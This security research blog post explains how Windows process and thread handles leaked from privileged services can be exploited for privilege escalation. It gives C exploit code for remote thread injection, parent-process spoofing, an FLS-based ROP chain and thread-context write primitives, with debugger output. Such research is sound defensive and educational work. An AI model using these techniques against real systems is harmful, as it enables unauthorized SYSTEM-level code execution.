Exploiting Leaked Process and Thread Handles
Over the years I’ve seen and exploited the occasional leaked handle bug. These can be
particularly fun to toy with, as the handles aren’t always granted
PROCESS_ALL_ACCESS
or THREAD_ALL_ACCESS
, requiring a bit more ingenuity.
This post will address the various access rights assignable to handles and what we
can do to exploit them to gain elevated code execution. I’ve chosen to focus
specifically on process and thread handles as this seems to be the most common,
but surely other objects can be exploited in similar manner.
As background, while this bug can occur under various circumstances, I’ve most
commonly seen it manifest when some privileged process opens a handle with
bInheritHandle
set to true. Once this happens, any child process of this
privileged process inherits the handle and all access it grants. As example,
assume a SYSTEM level process does this:
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
Since it’s allowing the opened handle to be inherited, any child process will gain access to it. If they execute userland code impersonating the desktop user, as a service might often do, those userland processes will have access to that handle.
Existing bugs
There are several public bugs we can point to over the years as example and
inspiration. As per usual James Forshaw has a fun one from 2016[0] in which
he’s able to leak a privileged thread handle out of the secondary logon
service with THREAD_ALL_ACCESS
. This is the most “open” of permissions, but
he exploited it in a novel way that I was unaware of, at the time.
Another one from Ivan Fratric exploited[1] a leaked process handle with
PROCESS_DUP_HANDLE
, which even Microsoft knew was bad. In his Bypassing Mitigations by Attacking JIT Server in Microsoft Edge
whitepaper, he
identifies the JIT server process mapping memory into the content process. To
do this, the JIT process needs a handle to it. The content process calls
DuplicateHandle
on itself with the PROCESS_DUP_HANDLE
, which can be
exploited to obtain a full access handle.
A more recent example is a Dell LPE [2] in which a THREAD_ALL_ACCESS
handle
was obtained from a privileged process. They were able to exploit this via a
dropped DLL and an APC.
Setup
In this post, I wanted to examine all possible access rights to determine which were exploitable on there own and which were not. Of those that were not, I tried to determine what concoction of privileges were necessary to make it so. I’ve tried to stay “realistic” here in my experience, but you never know what you’ll find in the wild, and this post reflects that.
For testing, I created a simple client and server: a privileged server that leaks a handle, and a client capable of consuming it. Here’s the server:
#include "pch.h"
#include <iostream>
#include <Windows.h>
int main(int argc, char **argv)
{
if (argc <= 1) {
printf("[-] Please give me a target PID\n");
return -1;
}
HANDLE hUserToken, hUserProcess;
HANDLE hProcess, hThread;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
hUserProcess = OpenProcess(PROCESS_QUERY_INFORMATION, false, atoi(argv[1]));
if (!OpenProcessToken(hUserProcess, TOKEN_ALL_ACCESS, &hUserToken)) {
printf("[-] Failed to open user process: %d\n", GetLastError());
CloseHandle(hUserProcess);
return -1;
}
hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, GetCurrentProcessId());
printf("[+] Process: %x\n", hProcess);
CreateProcessAsUserA(hUserToken,
"VulnServiceClient.exe",
NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
SuspendThread(hThread);
return 0;
}
In the above, I’m grabbing a handle to the token we want to impersonate, opening an inheritable handle to the current process (which we’re running as SYSTEM), then spawning a child process. This child process is simply my client application, which will go about attempting to exploit the handle.
The client is, of course, a little more involved. The only component that needs
a little discussion up front is fetching the leaked handle. This can be done
via NtQuerySystemInformation
and does not require any special privileges:
void ProcessHandles()
{
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
_NtQuerySystemInformation NtQuerySystemInformation =
(_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
_NtDuplicateObject NtDuplicateObject =
(_NtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject");
_NtQueryObject NtQueryObject =
(_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject");
_RtlEqualUnicodeString RtlEqualUnicodeString =
(_RtlEqualUnicodeString)GetProcAddress(hNtdll, "RtlEqualUnicodeString");
_RtlInitUnicodeString RtlInitUnicodeString =
(_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
ULONG handleInfoSize = 0x10000;
NTSTATUS status;
PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
DWORD dwPid = GetCurrentProcessId();
printf("[+] Looking for process handles...\n");
while ((status = NtQuerySystemInformation(
SystemHandleInformation,
phHandleInfo,
handleInfoSize,
NULL
)) == STATUS_INFO_LENGTH_MISMATCH)
phHandleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(phHandleInfo, handleInfoSize *= 2);
if (status != STATUS_SUCCESS)
{
printf("NtQuerySystemInformation failed!\n");
return;
}
printf("[+] Fetched %d handles\n", phHandleInfo->HandleCount);
// iterate handles until we find the privileged process
for (int i = 0; i < phHandleInfo->HandleCount; ++i)
{
SYSTEM_HANDLE handle = phHandleInfo->Handles[i];
POBJECT_TYPE_INFORMATION objectTypeInfo;
PVOID objectNameInfo;
UNICODE_STRING objectName;
ULONG returnLength;
// Check if this handle belongs to the PID the user specified
if (handle.ProcessId != dwPid)
continue;
objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
if (NtQueryObject(
(HANDLE)handle.Handle,
ObjectTypeInformation,
objectTypeInfo,
0x1000,
NULL
) != STATUS_SUCCESS)
continue;
if (handle.GrantedAccess == 0x0012019f)
{
free(objectTypeInfo);
continue;
}
objectNameInfo = malloc(0x1000);
if (NtQueryObject(
(HANDLE)handle.Handle,
ObjectNameInformation,
objectNameInfo,
0x1000,
&returnLength
) != STATUS_SUCCESS)
{
objectNameInfo = realloc(objectNameInfo, returnLength);
if (NtQueryObject(
(HANDLE)handle.Handle,
ObjectNameInformation,
objectNameInfo,
returnLength,
NULL
) != STATUS_SUCCESS)
{
free(objectTypeInfo);
free(objectNameInfo);
continue;
}
}
// check if we've got a process object; there should only be one, but should we
// have multiple, this is where we'd perform the checks
objectName = *(PUNICODE_STRING)objectNameInfo;
UNICODE_STRING pProcess, pThread;
RtlInitUnicodeString(&pThread, L"Thread");
RtlInitUnicodeString(&pProcess, L"Process");
if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pProcess, TRUE) && TARGET == 0) {
printf("[+] Found process handle (%x)\n", handle.Handle);
HANDLE hProcess = (HANDLE)handle.Handle;
}
else if (RtlEqualUnicodeString(&objectTypeInfo->Name, &pThread, TRUE) && TARGET == 1) {
printf("[+] Found thread handle (%x)\n", handle.Handle);
HANDLE hThread = (HANDLE)handle.Handle;
else
continue;
free(objectTypeInfo);
free(objectNameInfo);
}
}
We’re essentially just fetching all system handles, filtering down to ones belonging to our process, then hunting for a thread or a process. In a more active client process with many threads or process handles we’d need to filter down further, but this is sufficient for testing.
The remainder of this post will be broken down into process and thread security access rights.
Process
There are approximately 14 process-specific rights[3]. We’re going to ignore the standard object access rights for now (DELETE, READ_CONTROL, etc.) as they apply more to the handle itself than what it allows one to do.
Right off the bat, we’re going to dismiss the following:
PROCESS_QUERY_INFORMATION
PROCESS_QUERY_LIMITED_INFORMATION
PROCESS_SUSPEND_RESUME
PROCESS_TERMINATE
PROCESS_SET_QUOTA
PROCESS_VM_OPERATION
PROCESS_VM_READ
SYNCHRONIZE
To be clear I’m only suggesting that the above access rights cannot be exploited on their own; they are, of course, very useful when roped in with others. There may be weird edge cases in which one of these might be useful (PROCESS_TERMINATE, for example), but barring any magic, I don’t see how.
That leaves the following:
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_SET_INFORMATION
PROCESS_VM_WRITE
We’ll run through each of these individually.
PROCESS_ALL_ACCESS
The most obvious of them all, this one grants us access to it all. We can simply allocate memory and create a thread to obtain code execution:
char payload[] = "\xcc\xcc";
LPVOID lpBuf = VirtualAllocEx(hProcess, NULL, 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lpBuf, payload, 2, NULL);
CreateRemoteThread(hProcess, NULL, 0, lpBuf, 0, 0, NULL);
Nothing to it.
PROCESS_CREATE_PROCESS
This right is “required to create a process”, which is to say that we can spawn child processes. To do this remotely, we just need to spawn a process and set its parent to the privileged process we’ve got a handle to. This will create the new process and inherit its parent token which will hopefully be a SYSTEM token.
Here’s how we do that:
STARTUPINFOEXA sinfo = { sizeof(sinfo) };
PROCESS_INFORMATION pinfo;
LPPROC_THREAD_ATTRIBUTE_LIST ptList = NULL;
SIZE_T bytes;
sinfo.StartupInfo.cb = sizeof(STARTUPINFOEXA);
InitializeProcThreadAttributeList(NULL, 1, 0, &bytes);
ptList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(bytes);
InitializeProcThreadAttributeList(ptList, 1, 0, &bytes);
UpdateProcThreadAttribute(ptList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hPrivProc, sizeof(HANDLE), NULL, NULL);
sinfo.lpAttributeList = ptList;
CreateProcessA("cmd.exe", (LPSTR)"cmd.exe /c calc.exe",
NULL, NULL, TRUE,
EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
&sinfo.StartupInfo, &pinfo);
We should now have calc running with the privileged token. Obviously we’d want to replace that with something more useful!
PROCESS_CREATE_THREAD
Here we’ve got the ability to use CreateRemoteThread
, but can’t control any
memory in the target process. There are of course ways we can influence memory
without direct write access, such as WNF, but we’d still have no way of
resolving those addresses. As it turns out, however, we don’t need the control.
CreateRemoteThread
can be pointed at a function with a single argument, which
gives us quite a bit of control. LoadLibraryA
and WinExec
are both great
candidates for executing child processes or loading arbitrary code.
As example, there’s an ANSI cmd.exe
located in msvcrt.dll at offset 0x503b8.
We can pass this as an argument to CreateRemoteThread
and trigger a WinExec
call to pop a shell:
DWORD dwCmd = (GetModuleBaseAddress(GetCurrentProcessId(), L"msvcrt.dll") + 0x503b8);
HANDLE hThread = CreateRemoteThread(hPrivProc, NULL, 0,
(LPTHREAD_START_ROUTINE)WinExec,
(LPVOID)dwCmd,
0, NULL);
We can do something similar for LoadLibraryA
. This of course is predicated on
the system path containing a writable directory for our user.
PROCESS_DUP_HANDLE
Microsoft’s own documentation on process security and access rights points to
this specifically as a sensitive right. Using it, we can simply duplicate our
process handle with PROCESS_ALL_ACCESS
, allowing us full RW to its address
space. As per Ivan Fratric’s JIT bug, it’s as simple as this:
HANDLE hDup = INVALID_HANDLE_VALUE;
DuplicateHandle(hPrivProc, GetCurrentProcess(), GetCurrentProcess(), &hDup, PROCESS_ALL_ACCESS, 0, 0)
Now we can simply follow the WriteProcessMemory/CreateRemoteThread strategy for executing arbitrary code.
PROCESS_SET_INFORMATION
Granting this permission allows one to execute SetInformationProcess
in
addition to several fields in NtSetInformationProcess
. The latter is far more
powerful, but many of the PROCESSINFOCLASS
fields available are either read
only or require additional privileges to actually set (SeDebugPrivilege
for
ProcessExceptionPort
and ProcessInstrumentationCallback
(win7) for
example). Process Hacker[15] maintains an up to date definition of this class
and its members.
Of the available flags, none were particularly interesting on their own. I
needed to add PROCESS_VM_*
privileges in order to make any usable and at
that point we defeat the purpose.
PROCESS_VM_*
This covers the three flavors of VM access: WRITE/READ/OPERATION. The first two
should be self-explanatory and the third allows one to operate on the virtual
address space itself, such as changing page protections (VirtualProtectEx) or
allocating memory (VirtualAllocEx). I won’t address each permutation of these
three, but I think it’s reasonable to assume that PROCESS_VM_WRITE
is a
necessary requirement. While PROCESS_VM_OPERATION
allows us to crash the
remote process which could open up other flaws, it’s not a generic nor elegant
approach. Ditto with PROCESS_VM_READ
.
PROCESS_VM_WRITE
proved to be a challenge on its own, and I was unable to
come up with a generic solution. At first blush, the entire set of
Shatter-like injection strategies documented by Hexacorn[12] seem like
they’d be perfect. They simply require the remote process to use windows,
clipboard registrations, etc. None of these are guaranteed, but chances are one
is bound to exist. Unfortunately for us, many of them restrict access across
sessions or scaling integrity levels. We can write into the remote process,
but we need some way to gain control over execution flow.
In addition to being unable to modify page permissions, we cannot read nor map/allocate memory. There are plenty of ways we can leak memory from the remote process without directly interfacing with it, however.
Using NtQuerySystemInformation
, for example, we can enumerate all threads
inside a remote process regardless of its IL. This grants us a list of
SYSTEM_EXTENDED_THREAD_INFORMATION
objects which contain, among other
things, the address of the TEB. NtQueryInformationProcess
allows us to fetch
the remote process PEB address. This latter API requires the
PROCESS_QUERY_INFORMATION
right, however, which ended up throwing a major
wrench in my plan. Because of this I’m appending PROCESS_QUERY_INFORMATION
onto PROCESS_VM_WRITE
which gives us the necessary components to pull this
off. If someone knows of a way to leak the address of a remote process PEB
without it, I’d love to hear.
The approach I took was a bit loopy, but it ended up working reliably and generically. If you’ve read my previous post on fiber local storage (FLS)[13], this is the research I was referring to. If you haven’t, I recommend giving it a brief read, but I’ll regurgitate a bit of it here.
Briefly, we can abuse fibers and FLS to overwrite callbacks which are executed “…on fiber deletion, thread exit, and when an FLS index is freed”. The primary thread of a process will always setup a fiber, thus there will always be a callback for us to overwrite (msvcrt!_freefls). Callbacks are stored in the PEB (FlsCallback) and the fiber local storage in the TEB (FlsData). By smashing the FlsCallback we can obtain control over execution flow when one of the fiber actions are taken.
With only write access to the process, however, this becomes a bit convoluted. We cannot allocate memory and so we need some known location to put the payload. In addition, the FlsCallback and FlsData variables in PEB/TEB are pointers and we’re unable to read these.
Stashing the payload turned out to be pretty simple. Since we’ve established we can leak PEB/TEB addresses we already have two powerful primitives. After looking over both structures, I found that thread local storage (TLS) happened to provide us with enough room to store ROP gadgets and a thin payload. TLS is embedded within the structure itself, so we can simply offset into the TEB address (which we have). If you’re unfamiliar with TLS, Skywing’s write-ups are fantastic and have aged well[14].
Gaining control over the callback was a little trickier. A pointer to a
_FLS_CALLBACK_INFO
structure is stored in the PEB (FlsCallback) and is an
opaque structure. Since we can’t actually read this pointer, we have no simple
way of overwriting the pointer. Or do we?
What I ended up doing is overwriting the FlsCallback pointer itself in the PEB,
essentially creating my own fake _FLS_CALLBACK_INFO
structure in TLS. It’s a
pretty simple structure and really only has one value of importance: the
callback pointer.
In addition, as per the FLS article, we also need to take control over ECX/RCX.
This will allow us to stack pivot and continue executing our ROP payload. This
requires that we update the TEB->FlsData
entry which we also are unable to
do, since it’s a pointer. Much like FlsCallback
, though, I was able to just
overwrite this value and craft my own data structure, which also turned out to
be pretty simple. The TLS buffer ended up looking like this:
//
// 0 ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] 41414141 41414141 41414141 41414141
//
There just so happens to be a perfect stack pivot gadget located in
kernelbase!SwitchToFiberContext
(or kernel32!SwitchToFiber
on Windows 7):
7603c415 8ba1d8000000 mov esp,dword ptr [ecx+0D8h]
7603c41b c20400 ret 4
Putting this all together, execution results in:
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c415 esp=0019fd6c ebp=0019fd84 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
kernel32!SwitchToFiber+0x115:
7603c415 8ba1d8000000 mov esp,dword ptr [ecx+0D8h]
ds:0023:7ffdee2c=7ffdee30
0:000> p
eax=7603c415 ebx=7ffdf000 ecx=7ffded54 edx=00280bc9 esi=00000001 edi=7ffdee28
eip=7603c41b esp=7ffdee30 ebp=0019fd84 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
kernel32!SwitchToFiber+0x11b:
7603c41b c20400 ret 4
0:000> dd esp l3
7ffdee30 41414141 41414141 41414141
Now we’ve got EIP and a stack pivot. Instead of marking memory and executing
some other payload, I took a quick and lazy strategy and simply called
LoadLibraryA
to load a DLL off disk from an arbitrary location. This works
well, is reliable, and even on process exit will execute and block, depending
on what you do within the DLL. Here’s the final code to achieve all this:
_NtWriteVirtualMemory NtWriteVirtualMemory = (_NtWriteVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll"), "NtWriteVirtualMemory");
LPVOID lpBuf = malloc(13*sizeof(SIZE_T));
HANDLE hProcess = OpenProcess(PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, dwTargetPid);
if (hProcess == NULL)
return;
SIZE_T LoadLibA = (SIZE_T)LoadLibraryA;
SIZE_T RemoteTeb = GetRemoteTeb(hProcess), TlsAddr = 0;
TlsAddr = RemoteTeb + 0xe10;
SIZE_T RemotePeb = GetRemotePeb(hProcess);
SIZE_T PivotGadget = 0x7603c415;
SIZE_T StackAddress = (TlsAddr + 28) - 0xd8;
SIZE_T RtlExitThread = (SIZE_T)GetProcAddress(GetModuleHandleA("ntdll"), "RtlExitUserThread");
SIZE_T LoadLibParam = (SIZE_T)TlsAddr + 48;
//
// construct our TlsSlots payload:
// 0 ] 00000000 00000000 [STACK PIVOT] 00000000
// 16 ] 00000000 00000000 [ECX VALUE] [NEW STACK PTR]
// 32 ] [LOADLIB ADDR] 41414141 [RET ADDR] [LOADLIB ARG PTR]
// 48 ] 41414141
//
memset(lpBuf, 0x0, 16);
*((DWORD*)lpBuf + 2) = PivotGadget;
*((DWORD*)lpBuf+ 4) = 0;
*((DWORD*)lpBuf + 5) = 0;
*((DWORD*)lpBuf + 6) = StackAddress;
StackAddress = TlsAddr + 32;
*((DWORD*)lpBuf + 7) = StackAddress;
*((DWORD*)lpBuf + 8) = LoadLibA;
*((DWORD*)lpBuf + 9) = 0x41414141; // junk
*((DWORD*)lpBuf + 10) = RtlExitThread;
*((DWORD*)lpBuf + 11) = (SIZE_T)TlsAddr + 48;
*((DWORD*)lpBuf + 12) = 0x41414141; // DLL name (AAAA.dll)
NtWriteVirtualMemory(hProcess, (PVOID)TlsAddr, lpBuf, (13 * sizeof(SIZE_T)), NULL);
// update FlsCallback in PEB and FlsData in TEB
StackAddress = TlsAddr + 12;
NtWriteVirtualMemory(hProcess, (LPVOID)(RemoteTeb + 0xfb4), (PVOID)&StackAddress, sizeof(SIZE_T), NULL);
NtWriteVirtualMemory(hProcess, (LPVOID)(RemotePeb + 0x20c), (PVOID)&TlsAddr, sizeof(SIZE_T), NULL);
If all works well you should see attempts to load AAAA.dll
off disk when the
callback is executed (just close the process). As a note, we’re using
NtWriteVirtualMemory
here because WriteProcessMemory
requires
PROCESS_VM_OPERATION
which we may not have.
Another variation of this access might be PROCESS_VM_WRITE|PROCESS_VM_READ
.
This gives us visibility into the address space, but we still cannot allocate
or map memory into the remote process. Using the above strategy we can rid
ourselves of the PROCESS_QUERY_INFORMATION
requirement and simply read the
PEB address out of TEB.
Finally, consider PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION
.
Granting us PROCESS_VM_OPERATION
loosens the restrictions quite a bit, as we
can now allocate memory and change page permissions. This allows us to more
easily use the above strategy, but also perform inline and IAT hooks.
Thread
As with the process handles, there are a handful of access rights we can dismiss immediately:
SYNCHRONIZE
THREAD_QUERY_INFORMATION
THREAD_GET_CONTEXT
THREAD_QUERY_LIMITED_INFORMATION
THREAD_SUSPEND_RESUME
THREAD_TERMINATE
Which leaves the following:
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_IMPERSONATE
THREAD_SET_CONTEXT
THREAD_SET_INFORMATION
THREAD_SET_LIMITED_INFORMATION
THREAD_SET_THREAD_TOKEN
THREAD_ALL_ACCESS
There’s quite a lot we can do with this, including everything described in the
following thread access rights sections. I personally find the
THREAD_DIRECT_IMPERSONATION
strategy to be the easiest.
There is another option that is a bit more arcane, but equally viable. Note
that this thread access doesn’t give us VM read/write privileges, so there’s
no easy to way to “write” into a thread, since that doesn’t really make sense.
What we do have, however, is a series of APIs that sort of grant us that:
SetThreadContext
[4] and GetThreadContext
[5]. About a decade ago a code
injection technique dubbed Ghostwriting[6] was released to little fanfare. In
it, the author describes a code injection strategy that does not require the
typical win32 API calls; there’s no WriteProcessMemory, NtMapViewOfSection, or
even OpenProcess.
While the write-up is lacking in a few departments, it’s quite a clever bit of
code. In short, the author abuses the SetThreadContext
/GetThreadContext
calls in tandem with a set of specific assembly gadgets to write a payload,
dword by dword, onto the threads stack. Once written, they use
NtProtectVirtualMemoryAddress
to mark the code RWX and redirect code flow to
their payload.
For their write gadget, they hunt for a pattern inside NTDLL:
MOV [REG1], REG2
RET
They then locate a JMP $
, or jump here, which will operate as an auto lock
and infinitely loop. Once we’ve found our two gadgets, we suspend the thread.
We update its RIP to point to the MOV gadget, set our REG1 to an adjusted RSP
so the return address is the JMP $
, and set REG2 to the jump gadget. Here’s
my write function:
void WriteQword(CONTEXT context, HANDLE hThread, size_t WriteWhat, size_t WriteWhere)
{
SetContextRegister(&context, g_rside, WriteWhat);
SetContextRegister(&context, g_lside, WriteWhere);
context.Rsp = StackBase;
context.Rip = MovAddr;
WaitForThreadAutoLock(hThread, &context, JmpAddr);
}
The SetContextRegister
call simply assigns REG1 and REG2 in our gadget to the
appropriate registers. Once those are set, we set our stack base (adjusted from
threads RSP) and update RIP to our gadget. The first time we execute this we’ll
write our JMP $
gadget to the stack.
They use what they call a thread auto lock to control execution flow (edits mine):
void WaitForThreadAutoLock(HANDLE Thread, CONTEXT* PThreadContext,HWND ThreadsWindow,DWORD AutoLockTargetEIP)
{
SetThreadContext(Thread,PThreadContext);
do
{
ResumeThread(Thread);
Sleep(30);
SuspendThread(Thread);
GetThreadContext(Thread,PThreadContext);
}
while(PThreadContext->Eip!=AutoLockTargetEIP);
}
It’s really just a dumb waiter that allows the thread to execute a little bit each run before checking if the “sink” gadget has been reached.
Once our execution hits the jump, we have our write primitive. We can now simply adjust RIP back to the MOV gadget, update RSP, and set REG1 and REG2 to any values we want.
I ported the core function of this technique to x64 to demonstrate its
viability. Instead of using it to execute an entire payload, I simply execute
LoadLibraryA
to load in an arbitrary DLL at an arbitrary path. The code is
available on Github[11]. Turning it into something production ready is left as
an exercise for the reader ;)
Additionally, while attending Blackhat 2019, I saw a process injection talk by the SafeBreach Labs group. They’ve release a code injection tool that contains an x64 implementation of GhostWriting[10]. While I haven’t personally evaluated it, it’s probably more production ready and usable than mine.
THREAD_DIRECT_IMPERSONATION
This differs from THREAD_IMPERSONATE
in that it allows the thread token to be
impersonated, not simply TO impersonate. Exploiting this is simply a matter of
using the NtImpersonateThread
[8] API, as pointed out by James Forshaw[0][7].
Using this we’re able to create a thread totally under our control and
impersonate the privileged one:
hNewThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpRtl, 0, CREATE_SUSPENDED, &dwTid);
NtImpersonateThread(hNewThread, hThread, &sqos);
The hNewThread
will now be executing with a SYSTEM token, allowing us to do
whatever we need under the privileged impersonation context.
THREAD_IMPERSONATE
Unfortunately I was unable to identify a surefire, generic method for exploiting this one. We have no ability to query the remote thread, nor can we gain any control over its execution flow. We’re simply allowed to manage its impersonation state.
We can use this to force the privileged thread to impersonate us, using the
NtImpersonateThread
call, which may unlock additional logic bugs in the
application. For example, if the service were to create shared resources under
a user context for which it would typically be SYSTEM, such as a file, we can
gain ownership over that file. If multiple privileged threads access it for
information (such as configuration) it could lead to code execution.
THREAD_SET_CONTEXT
While this right grants us access to SetThreadContext
, it also conveniently
allows us to use QueueUserAPC
. This is effectively granting us a
CreateRemoteThread
primitive with caveat. For an APC to be processed by the
thread, it needs to enter an alertable state. This happens when a specific set
of win32 functions are executed, so it is entirely possible that the thread
never becomes alertable.
If we’re working with an uncooperative thread, SetThreadContext
comes in
handy. Using it, we can force the thread to become alertable via the
NtTestAlert
function. Of course, we have no ability to call
GetThreadContext
and will therefore likely lose control of the thread after
exploitation.
In combination with THREAD_GET_CONTEXT
, this right would allow us to
replicate the Ghostwriting code injection technique discussed in the
THREAD_ALL_ACCESS
section above.
THREAD_SET_INFORMATION
Needed to set various ThreadInformationClass[9] values on a thread, usually via
NtSetInformationThread
. After looking through all of these, I did not
identify any immediate ways in which we could influence the remote thread. Some
of the values are interesting but unusuable (ThreadSetTlsArrayAddress
,
ThreadAttachContainer
, etc) and are either not implemented/removed or
require SeDebugPrivilege
or similar.
I’m not really sure what would make this a viable candidate either. There’s really not a lot of juicy stuff that can be done via the available functions
THREAD_SET_LIMITED_INFORMATION
This allows the caller to set a subset of THREAD_INFORMATION_CLASS
values,
namely: ThreadPriority
, ThreadPriorityBoost
, ThreadAffinityMask
,
ThreadSelectedCpuSets
, and ThreadNameInformation
. None of these get us
anywhere near an exploitable primitive.
THREAD_SET_THREAD_TOKEN
Similar to THREAD_IMPERSONATE
, I was unable to find a direct and generic
method of abusing this right. I can set the thread’s token or modify a few
fields (via SetTokenInformation
), but this doesn’t grant us much.
Conclusion
I was a little disappointed in how uneventful thread rights seemed to be. Almost half of them proved to be unexploitable on their own, and even in combination did not turn much up. As per above, having one of the following three privileges is necessary to turn a leaked thread handle into something exploitable:
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_SET_CONTEXT
Missing these will require a deeper understanding of your target and some creativity.
Similarly, processes have a specific subset of rights that are directly exploitable:
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_VM_WRITE
Barring these, more creativity is required.
References
[0]https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
[1]https://googleprojectzero.blogspot.com/2018/05/bypassing-mitigations-by-attacking-jit.html
[2]https://d4stiny.github.io/Local-Privilege-Escalation-on-most-Dell-computers/
[3]https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
[4]https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext
[5]https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext
[6]http://blog.txipinet.com/2007/04/05/69-a-paradox-writing-to-another-process-without-openning-it-nor-actually-writing-to-it/
[7]https://tyranidslair.blogspot.com/2017/08/the-art-of-becoming-trustedinstaller.html
[8]https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtImpersonateThread.html
[9]https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/master/NtApiDotNet/NtThreadNative.cs#L51
[10]https://github.com/SafeBreach-Labs/pinjectra
[11]https://gist.github.com/hatRiot/aa77f007601be75684b95fe7ba978079
[12]http://www.hexacorn.com/blog/category/code-injection/
[13]http://hatriot.github.io/blog/2019/08/12/code-execution-via-fiber-local-storage
[14]http://www.nynaeve.net/?p=180
[15]https://github.com/processhacker/processhacker/blob/master/phnt/include/ntpsapi.h#L98